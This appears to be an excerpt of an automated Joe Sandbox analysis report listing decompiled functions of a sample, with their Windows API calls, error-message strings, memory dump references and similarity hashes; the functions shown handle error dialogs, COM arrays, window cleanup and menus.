GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,00773B9D,?,0000138A), ref: 00799742
LoadStringW.USER32(00000000,?,?,00773B9D), ref: 00799745
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00799866

Strings

^ ERROR, xrefs: 007997FB
Error: , xrefs: 0079981D
%s (%d) : ==> %s: %s %s, xrefs: 0079984A
Line %d:, xrefs: 007997A0
Line %d (File "%s"):, xrefs: 0079978F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 59a7b29518383b3aa36390f933b2d7761d1923e5c508de4c3d7ff66c0a36bff4
Instruction ID: aeb44b949173cc9385032c148c41cdf3ab75c135c2859ebafdcd79e838c386c8
Opcode Fuzzy Hash: 59a7b29518383b3aa36390f933b2d7761d1923e5c508de4c3d7ff66c0a36bff4
Instruction Fuzzy Hash: 88414FB2800209EAEF14FBE4DD4ADEEB778AF55340F504029F60572192EB796F48CB61

Function 0078FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0078FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0078FB08
VariantInit.OLEAUT32(?), ref: 0078FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0078FB3A
VariantCopy.OLEAUT32(?,?), ref: 0078FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0078FBA1
VariantClear.OLEAUT32(?), ref: 0078FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0078FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0078FBCC
VariantClear.OLEAUT32(?), ref: 0078FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0078FBE9

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 2f394379f3ce540d584da489802cfcfc9c35b9126a67d0cbc7638da0fcbd9ad1
Instruction ID: fd0dd76ff716d54480fa2c5b375d916e1cc99f4281928dc7d56482cf873a5cb3
Opcode Fuzzy Hash: 2f394379f3ce540d584da489802cfcfc9c35b9126a67d0cbc7638da0fcbd9ad1
Instruction Fuzzy Hash: 52415375A00219DFDB05EF64C858DADBFB9FF48354F00C069E945A7261D738AA45CFA0

Function 00731410 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00731459
OleUninitialize.OLE32(?,00000000), ref: 007314F8
UnregisterHotKey.USER32(?), ref: 007316DD
DestroyWindow.USER32(?), ref: 007724B9
FreeLibrary.KERNEL32(?), ref: 0077251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0077254B

Strings

>y, xrefs: 00731542, 00731627
close all, xrefs: 00731454

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: >y$close all
API String ID: 469580280-2777715595
Opcode ID: f047acdc81dc557a634386c51a1daa4a712a58b3dc35c1e01ae9a9c74464b7eb
Instruction ID: f9ac05129df8d5fe9ec4b9d99f7a659f27101a513c7b752dccb39036dbe36ccc
Opcode Fuzzy Hash: f047acdc81dc557a634386c51a1daa4a712a58b3dc35c1e01ae9a9c74464b7eb
Instruction Fuzzy Hash: D9D15C31701212CFEB19EF14C499A29F7A4BF45740F5482ADE45AAB253DB38AD23CF51

Function 007A3388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 007A33CF

Part of subcall function 00739CB3: _wcslen.LIBCMT ref: 00739CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007A33F0

Strings

Incorrect parameters to object property !, xrefs: 007A34AB
Error: , xrefs: 007A34D1
"%s" (%d) : ==> %s:%s%s, xrefs: 007A3504
^ ERROR , xrefs: 007A349E
Line %d (File "%s"):, xrefs: 007A3443, 007A345C
"%s" (%d) : ==> %s:, xrefs: 007A3522

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: f8a56b0df58690ca8fcbbb117bc4eb818e8dc9d60d949ebc12c7aab4a481e2af
Instruction ID: 9776b8add1c89a06852fbdc38727bbecfcd307ce06859dafcca5d2f1f3c10680
Opcode Fuzzy Hash: f8a56b0df58690ca8fcbbb117bc4eb818e8dc9d60d949ebc12c7aab4a481e2af
Instruction Fuzzy Hash: DF5181B1D00209EAEF15EBA0CD4AEEEB778AF04340F108165F60572162EB7D2F58DB60

Function 007A1187 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,?), ref: 007A125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 007A1284
SafeArrayUnaccessData.OLEAUT32(?), ref: 007A12A8
SafeArrayAccessData.OLEAUT32(?,?), ref: 007A12D8
SafeArrayAccessData.OLEAUT32(?,?), ref: 007A135F
SafeArrayAccessData.OLEAUT32(?,007B4AFE), ref: 007A13C4
SafeArrayAccessData.OLEAUT32(?,?), ref: 007A1430

Strings

z, xrefs: 007A1474, 007A1408, 007A13A6, 007A133E, 007A1341, 007A13AC, 007A140E, 007A147A

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID: z
API String ID: 2550207440-4126016754
Opcode ID: 61a47047500d8e5328dfce0e78362de2e4dcee153e05c7c35d087ef6c1118112
Instruction ID: bebdfd7f6679d8f525330555e8400f650ff689787f3e16e36d3f0737b09af034
Opcode Fuzzy Hash: 61a47047500d8e5328dfce0e78362de2e4dcee153e05c7c35d087ef6c1118112
Instruction Fuzzy Hash: 6291C271A002099FEB01DF98C888BBE77B5FF86325F508129E941EB291D77CE941CB90

Function 00735BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00735C7A

Part of subcall function 00735D0A: GetClientRect.USER32(?,?), ref: 00735D30
Part of subcall function 00735D0A: GetWindowRect.USER32(?,?), ref: 00735D71
Part of subcall function 00735D0A: ScreenToClient.USER32(?,000000FF), ref: 00735D99

GetDC.USER32 ref: 007746F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00774708
SelectObject.GDI32(00000000,00000000), ref: 00774716
SelectObject.GDI32(00000000,00000000), ref: 0077472B
ReleaseDC.USER32(?,00000000), ref: 00774733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007747C4

Strings

U, xrefs: 00774693

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: b08d0e9bdab570af6a5193d0b47f01f5b079527d5aba9e68fbf5a0f54bd84232
Instruction ID: d0a1b769b602edc013a7ff1c5e8be594c8614cc5d119af4f8b8b5808ca52ac95
Opcode Fuzzy Hash: b08d0e9bdab570af6a5193d0b47f01f5b079527d5aba9e68fbf5a0f54bd84232
Instruction Fuzzy Hash: 20712531500205DFDF268F64C984EBA3BB5FF4A3A4F148269ED595A166C339CC41DFA0

Function 0076AF88 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 0076AFAB

Strings

log, xrefs: 0076B051, 0076B05D
acos, xrefs: 0076B123
exp, xrefs: 0076B070, 0076B0D2
log10, xrefs: 0076AFF5, 0076B045
asin, xrefs: 0076B117
pow, xrefs: 0076B08F, 0076B13B, 0076B14E
sqrt, xrefs: 0076B12F

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: b8e633a0398fcc479dfe7f3924c8939f1112ac846756743cde79f9504c4b4c47
Instruction ID: 14e0a163dc2136d5cd8912e2e3ce3d444c19ec92858bd163cdea924958e79868
Opcode Fuzzy Hash: b8e633a0398fcc479dfe7f3924c8939f1112ac846756743cde79f9504c4b4c47
Instruction Fuzzy Hash: 87517C7190050EEBCF189FA8E94C5EDBBB0FF0A300F244195D892E7265CB7D8DA58B19

Function 0079989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00773AAF,?,?,Bad directive syntax error,007CCC08,00000000,00000010,?,?), ref: 007998BC
LoadStringW.USER32(00000000,?,00773AAF,?), ref: 007998C3

Part of subcall function 00739CB3: _wcslen.LIBCMT ref: 00739CBD

MessageBoxW.USER32(00000000,?,?,00011010), ref: 00799987

Strings

Error: , xrefs: 00799955
Line %d:, xrefs: 00799912
%s (%d) : ==> %s.: %s %s, xrefs: 007998F1
Line %d (File "%s"):, xrefs: 0079992D
., xrefs: 0079996D

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: a9d619176ef000f1e6d0d42981a342c517cddff51a63e6a03131dcf0ec6b5a78
Instruction ID: 4fb31eb6d24310801e50edb4694f46c65221cad7f49533232f222fbd54793565
Opcode Fuzzy Hash: a9d619176ef000f1e6d0d42981a342c517cddff51a63e6a03131dcf0ec6b5a78
Instruction Fuzzy Hash: 6121747194021DEBEF15AF90CC0AEFD7775FF14300F044459F619651A2EB79A618DB50

Function 00748BCD Relevance: 13.7, APIs: 9, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00748F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00748BE8,?,00000000,?,?,?,?,00748BBA,00000000,?), ref: 00748FC5

DestroyWindow.USER32(?), ref: 00748C81
KillTimer.USER32(00000000,?,?,?,?,00748BBA,00000000,?), ref: 00748D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00786973
DeleteObject.GDI32(00000000), ref: 007869E6

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: a73076c3136fe9c292174acb4695a4ba9f1f74ddf6a7a748430156fe6cc392cd
Instruction ID: c2277f8da7d63b5d32e72ff0e8cd37e936a0c8a155835819c696b1221d9602f2
Opcode Fuzzy Hash: a73076c3136fe9c292174acb4695a4ba9f1f74ddf6a7a748430156fe6cc392cd
Instruction Fuzzy Hash: B7618031502614DFCB66DF14D98CB29BBF1FB40322F54855CE0469B6A0CB79AD90CF66

Function 007C50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 007C5186
ShowWindow.USER32(?,00000000), ref: 007C51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 007C51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 007C51D1

Part of subcall function 007C6FBA: DeleteObject.GDI32(?), ref: 007C6FE6

GetWindowLongW.USER32(?,000000F0), ref: 007C520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 007C521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007C524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 007C5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 007C5296

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 4e42046ae4d6e82fcf224fed76ab7f8746bf291a6b0b37ff4231556b8b3ff24f
Instruction ID: 748c1845149ce64422c2e92c1178785558d5ca98182151209b30ccdace93611d
Opcode Fuzzy Hash: 4e42046ae4d6e82fcf224fed76ab7f8746bf291a6b0b37ff4231556b8b3ff24f
Instruction Fuzzy Hash: D7516B70A40A08EFEF219E28CC4AF997BA5FB05325F58811DF615962E1C77AB9C0DB40

Function 00748B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00786890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 007868A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007868B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 007868D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007868F2
DestroyCursor.USER32(00000000), ref: 00786901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0078691E
DestroyCursor.USER32(00000000), ref: 0078692D

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: a73f3924984f3200b0b69a51b002e42f79cacb81f086867b894dc0a704e9035b
Instruction ID: 8c9b321fe63904428cd4ee14c48498a192673c92403cb666a852040d3c32d59c
Opcode Fuzzy Hash: a73f3924984f3200b0b69a51b002e42f79cacb81f086867b894dc0a704e9035b
Instruction Fuzzy Hash: E5515AB0A40209EFDB20DF25CC59FAA7BB6FB48760F10451CF956972A0DB78E990DB50

Function 0079BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0079BCFD
IsMenu.USER32(00000000), ref: 0079BD1D
CreatePopupMenu.USER32 ref: 0079BD53
GetMenuItemCount.USER32(016F3490), ref: 0079BDA4
InsertMenuItemW.USER32(016F3490,?,00000001,00000030), ref: 0079BDCC

Strings

2, xrefs: 0079BD37
0, xrefs: 0079BCA8

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008BB000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_730000_bwYw3UUfy7.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: d2977add5d6e1d1e7d82887dfc13b3c864700f59bf8d9166ffc080df7620cec7
Instruction ID: 0ad031991f8752f1c9911f8759c84b4a8e842f953efcc5be59c668f1a008f44f
Opcode Fuzzy Hash: d2977add5d6e1d1e7d82887dfc13b3c864700f59bf8d9166ffc080df7620cec7
Instruction Fuzzy Hash: CD51B070B00209DBDF11CFA8FA89BAEBBF4BF45314F248159E415D7291D778A941CBA1

Function 00752D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00752D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00752D53
_ValidateLocalCookies.LIBCMT ref: 00752DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00752E0C
_ValidateLocalCookies.LIBCMT ref: 00752E61

Strings

csm, xrefs: 00752DF6
&Hu, xrefs: 00752DFE, 00752E07, 00752E18

Memory Dump Source

Source File: 00000000.00000002.1323661311.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true

Associated: 00000000.00000002.1323585900.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.00000000007FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1323661311.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324041036.00000000008A2000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008A3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1324064279.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
